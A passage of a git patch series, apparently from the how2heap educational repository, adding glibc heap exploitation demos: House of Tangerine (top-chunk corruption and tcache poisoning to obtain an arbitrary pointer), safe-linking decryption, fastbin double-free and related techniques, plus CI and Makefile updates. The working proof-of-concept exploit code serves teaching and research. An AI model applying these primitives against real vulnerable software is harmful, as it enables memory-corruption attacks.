a positive and negative OOB (e.g. 
BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. 
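+ * (Illustrative numbers only, assuming the 64-bit constants defined above and
+ * 0x1000-byte pages: the corrupted top size keeps just its page-offset bits,
+ * roughly CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1 = 0x10 + 0x10 + 0x40 = 0x60;
+ * carving off the fencepost then leaves
+ * (0x60 - FENCEPOST) & MALLOC_MASK = (0x60 - 0x20) & ~0xf = 0x40 = CHUNK_SIZE_1,
+ * which is the 0x40 tcache bin that the later malloc(SIZE_1) calls draw from.)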
+ * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} diff --git a/glibc_2.37/house_of_tangerine.c b/glibc_2.37/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.37/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. 
BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. 
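+ * (Illustrative numbers only, assuming the 64-bit constants defined above and
+ * 0x1000-byte pages: the corrupted top size keeps just its page-offset bits,
+ * roughly CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1 = 0x10 + 0x10 + 0x40 = 0x60;
+ * carving off the fencepost then leaves
+ * (0x60 - FENCEPOST) & MALLOC_MASK = (0x60 - 0x20) & ~0xf = 0x40 = CHUNK_SIZE_1,
+ * which is the 0x40 tcache bin that the later malloc(SIZE_1) calls draw from.)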
+ * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} diff --git a/glibc_2.38/house_of_tangerine.c b/glibc_2.38/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.38/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. 
BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. 
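+ * (Illustrative numbers only, assuming the 64-bit constants defined above and
+ * 0x1000-byte pages: the corrupted top size keeps just its page-offset bits,
+ * roughly CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1 = 0x10 + 0x10 + 0x40 = 0x60;
+ * carving off the fencepost then leaves
+ * (0x60 - FENCEPOST) & MALLOC_MASK = (0x60 - 0x20) & ~0xf = 0x40 = CHUNK_SIZE_1,
+ * which is the 0x40 tcache bin that the later malloc(SIZE_1) calls draw from.)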
+ * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} From ae4dbf558203d72296e443e326d885b0f7994e63 Mon Sep 17 00:00:00 2001 From: Kyle Zeng Date: Tue, 16 Apr 2024 22:19:14 -0700 Subject: [PATCH 3/3] add 2.39 --- .github/workflows/ci.yml | 26 +- Makefile | 4 +- glibc_2.39/decrypt_safe_linking.c | 66 ++++ glibc_2.39/fastbin_dup.c | 50 +++ glibc_2.39/fastbin_dup_consolidate.c | 43 +++ glibc_2.39/fastbin_dup_into_stack.c | 77 +++++ glibc_2.39/fastbin_reverse_into_tcache.c | 104 ++++++ glibc_2.39/house_of_botcake.c | 75 +++++ glibc_2.39/house_of_einherjar.c | 157 +++++++++ glibc_2.39/house_of_lore.c | 137 ++++++++ glibc_2.39/house_of_mind_fastbin.c | 235 +++++++++++++ glibc_2.39/house_of_spirit.c | 48 +++ glibc_2.39/house_of_water.c | 370 +++++++++++++++++++++ glibc_2.39/large_bin_attack.c | 94 ++++++ glibc_2.39/mmap_overlapping_chunks.c | 140 ++++++++ glibc_2.39/overlapping_chunks.c | 82 +++++ glibc_2.39/poison_null_byte.c | 161 +++++++++ glibc_2.39/safe_link_double_protect.c | 128 +++++++ glibc_2.39/sysmalloc_int_free.c | 3 +- glibc_2.39/tcache_house_of_spirit.c | 44 +++ glibc_2.39/tcache_poisoning.c | 63 ++++ glibc_2.39/tcache_stashing_unlink_attack.c | 80 +++++ glibc_2.39/unsafe_unlink.c | 64 ++++ 23 files changed, 2236 insertions(+), 15 deletions(-) create mode 100644 glibc_2.39/decrypt_safe_linking.c create mode 100644 glibc_2.39/fastbin_dup.c create mode 100644 glibc_2.39/fastbin_dup_consolidate.c create mode 100644 glibc_2.39/fastbin_dup_into_stack.c create mode 100644 glibc_2.39/fastbin_reverse_into_tcache.c create mode 100644 glibc_2.39/house_of_botcake.c create mode 100644 glibc_2.39/house_of_einherjar.c create mode 100644 glibc_2.39/house_of_lore.c create mode 100644 glibc_2.39/house_of_mind_fastbin.c create mode 100644 glibc_2.39/house_of_spirit.c create mode 100644 glibc_2.39/house_of_water.c create mode 100644 glibc_2.39/large_bin_attack.c create mode 100644 glibc_2.39/mmap_overlapping_chunks.c create mode 
100644 glibc_2.39/overlapping_chunks.c create mode 100644 glibc_2.39/poison_null_byte.c create mode 100644 glibc_2.39/safe_link_double_protect.c create mode 100644 glibc_2.39/tcache_house_of_spirit.c create mode 100644 glibc_2.39/tcache_poisoning.c create mode 100644 glibc_2.39/tcache_stashing_unlink_attack.c create mode 100644 glibc_2.39/unsafe_unlink.c diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index ed69079..0325f8b 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -152,16 +152,16 @@ jobs: with: ubuntu: '23.10' glibc: '2.38' - # v2_39: - # runs-on: ubuntu-22.04 - # name: glibc-v2.39 - # steps: - # - name: build how2heap - # uses: shellphish/how2heap/ci/build@master - # with: - # ubuntu: '24.04' - # - name: test how2heap - # uses: shellphish/how2heap/ci/test@master - # with: - # ubuntu: '24.04' - # glibc: '2.39' + v2_39: + runs-on: ubuntu-22.04 + name: glibc-v2.39 + steps: + - name: build how2heap + uses: shellphish/how2heap/ci/build@master + with: + ubuntu: '24.04' + - name: test how2heap + uses: shellphish/how2heap/ci/test@master + with: + ubuntu: '24.04' + glibc: '2.39' diff --git a/Makefile b/Makefile index 27bfc2e..9d2786d 100644 --- a/Makefile +++ b/Makefile @@ -10,6 +10,7 @@ V2.35 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_int V2.36 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine V2.37 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine V2.38 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.39 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine # turn technique names into paths VV2.23 = $(addprefix glibc_2.23/, $(V2.23)) @@ -23,8 +24,9 @@ VV2.35 = $(addprefix glibc_2.35/, $(V2.35)) VV2.36 = $(addprefix glibc_2.36/, $(V2.36)) VV2.37 = $(addprefix glibc_2.37/, $(V2.37)) VV2.38 = $(addprefix glibc_2.38/, $(V2.38)) +VV2.39 = $(addprefix glibc_2.39/, $(V2.39)) -PROGRAMS = $(BASE) $(VV2.23) $(VV2.24) $(VV2.27) $(VV2.31) $(VV2.32) $(VV2.33) $(VV2.34) $(VV2.35) $(VV2.36) $(VV2.37) $(VV2.38) 
+PROGRAMS = $(BASE) $(VV2.23) $(VV2.24) $(VV2.27) $(VV2.31) $(VV2.32) $(VV2.33) $(VV2.34) $(VV2.35) $(VV2.36) $(VV2.37) $(VV2.38) $(VV2.39) CFLAGS += -std=c99 -g -Wno-unused-result -Wno-free-nonheap-object LDLIBS += -ldl diff --git a/glibc_2.39/decrypt_safe_linking.c b/glibc_2.39/decrypt_safe_linking.c new file mode 100644 index 0000000..aaf0340 --- /dev/null +++ b/glibc_2.39/decrypt_safe_linking.c @@ -0,0 +1,66 @@ +#include +#include +#include + +long decrypt(long cipher) +{ + puts("The decryption uses the fact that the first 12bit of the plaintext (the fwd pointer) is known,"); + puts("because of the 12bit sliding."); + puts("And the key, the ASLR value, is the same with the leading bits of the plaintext (the fwd pointer)"); + long key = 0; + long plain; + + for(int i=1; i<6; i++) { + int bits = 64-12*i; + if(bits < 0) bits = 0; + plain = ((cipher ^ key) >> bits) << bits; + key = plain >> 12; + printf("round %d:\n", i); + printf("key: %#016lx\n", key); + printf("plain: %#016lx\n", plain); + printf("cipher: %#016lx\n\n", cipher); + } + return plain; +} + +int main() +{ + /* + * This technique demonstrates how to recover the original content from a poisoned + * value because of the safe-linking mechanism. + * The attack uses the fact that the first 12 bit of the plaintext (pointer) is known + * and the key (ASLR slide) is the same to the pointer's leading bits. + * As a result, as long as the chunk where the pointer is stored is at the same page + * of the pointer itself, the value of the pointer can be fully recovered. + * Otherwise, we can also recover the pointer with the page-offset between the storer + * and the pointer. What we demonstrate here is a special case whose page-offset is 0. + * For demonstrations of other more general cases, plz refer to + * https://github.com/n132/Dec-Safe-Linking + */ + + setbuf(stdin, NULL); + setbuf(stdout, NULL); + + // step 1: allocate chunks + long *a = malloc(0x20); + long *b = malloc(0x20); + printf("First, we create chunk a @ %p and chunk b @ %p\n", a, b); + malloc(0x10); + puts("And then create a padding chunk to prevent consolidation."); + + + // step 2: free chunks + puts("Now free chunk a and then free chunk b."); + free(a); + free(b); + printf("Now the freelist is: [%p -> %p]\n", b, a); + printf("Due to safe-linking, the value actually stored at b[0] is: %#lx\n", b[0]); + + // step 3: recover the values + puts("Now decrypt the poisoned value"); + long plaintext = decrypt(b[0]); + + printf("value: %p\n", a); + printf("recovered value: %#lx\n", plaintext); + assert(plaintext == (long)a); +} diff --git a/glibc_2.39/fastbin_dup.c b/glibc_2.39/fastbin_dup.c new file mode 100644 index 0000000..9d7d356 --- /dev/null +++ b/glibc_2.39/fastbin_dup.c @@ -0,0 +1,50 @@ +#include +#include +#include + +int main() +{ + setbuf(stdout, NULL); + + printf("This file demonstrates a simple double-free attack with fastbins.\n"); + + printf("Fill up tcache first.\n"); + void *ptrs[8]; + for (int i=0; i<8; i++) { + ptrs[i] = malloc(8); + } + for (int i=0; i<7; i++) { + free(ptrs[i]); + } + + printf("Allocating 3 buffers.\n"); + int *a = calloc(1, 8); + int *b = calloc(1, 8); + int *c = calloc(1, 8); + + printf("1st calloc(1, 8): %p\n", a); + printf("2nd calloc(1, 8): %p\n", b); + printf("3rd calloc(1, 8): %p\n", c); + + printf("Freeing the first one...\n"); + free(a); + + printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a); + // free(a); + + printf("So, instead, we'll free %p.\n", b); + free(b); + + printf("Now, we 
can free %p again, since it's not the head of the free list.\n", a); + free(a); + + printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a); + a = calloc(1, 8); + b = calloc(1, 8); + c = calloc(1, 8); + printf("1st calloc(1, 8): %p\n", a); + printf("2nd calloc(1, 8): %p\n", b); + printf("3rd calloc(1, 8): %p\n", c); + + assert(a == c); +} diff --git a/glibc_2.39/fastbin_dup_consolidate.c b/glibc_2.39/fastbin_dup_consolidate.c new file mode 100644 index 0000000..35af2b0 --- /dev/null +++ b/glibc_2.39/fastbin_dup_consolidate.c @@ -0,0 +1,43 @@ +#include +#include +#include + +int main() { + // reference: https://valsamaras.medium.com/the-toddlers-introduction-to-heap-exploitation-fastbin-dup-consolidate-part-4-2-ce6d68136aa8 + puts("This is a powerful technique that bypasses the double free check in tcachebin."); + printf("Fill up the tcache list to force the fastbin usage...\n"); + + void *ptr[7]; + + for(int i = 0; i < 7; i++) + ptr[i] = malloc(0x40); + for(int i = 0; i < 7; i++) + free(ptr[i]); + + void* p1 = calloc(1,0x40); + + printf("Allocate another chunk of the same size p1=%p \n", p1); + printf("Freeing p1 will add this chunk to the fastbin list...\n\n"); + free(p1); + + void* p3 = malloc(0x400); + printf("Allocating a tcache-sized chunk (p3=%p)\n", p3); + printf("will trigger the malloc_consolidate and merge\n"); + printf("the fastbin chunks into the top chunk, thus\n"); + printf("p1 and p3 are now pointing to the same chunk !\n\n"); + + assert(p1 == p3); + + printf("Triggering the double free vulnerability!\n\n"); + free(p1); + + void *p4 = malloc(0x400); + + assert(p4 == p3); + + printf("The double free added the chunk referenced by p1 \n"); + printf("to the tcache thus the next similar-size malloc will\n"); + printf("point to p3: p3=%p, p4=%p\n\n",p3, p4); + + return 0; +} diff --git a/glibc_2.39/fastbin_dup_into_stack.c b/glibc_2.39/fastbin_dup_into_stack.c new file mode 100644 index 0000000..b84be5a --- /dev/null +++ b/glibc_2.39/fastbin_dup_into_stack.c @@ -0,0 +1,77 @@ +#include +#include +#include + +int main() +{ + fprintf(stderr, "This file extends on fastbin_dup.c by tricking calloc into\n" + "returning a pointer to a controlled location (in this case, the stack).\n"); + + + fprintf(stderr,"Fill up tcache first.\n"); + + void *ptrs[7]; + + for (int i=0; i<7; i++) { + ptrs[i] = malloc(8); + } + for (int i=0; i<7; i++) { + free(ptrs[i]); + } + + + unsigned long stack_var[2] __attribute__ ((aligned (0x10))); + + fprintf(stderr, "The address we want calloc() to return is %p.\n", stack_var); + + fprintf(stderr, "Allocating 3 buffers.\n"); + int *a = calloc(1,8); + int *b = calloc(1,8); + int *c = calloc(1,8); + + fprintf(stderr, "1st calloc(1,8): %p\n", a); + fprintf(stderr, "2nd calloc(1,8): %p\n", b); + fprintf(stderr, "3rd calloc(1,8): %p\n", c); + + fprintf(stderr, "Freeing the 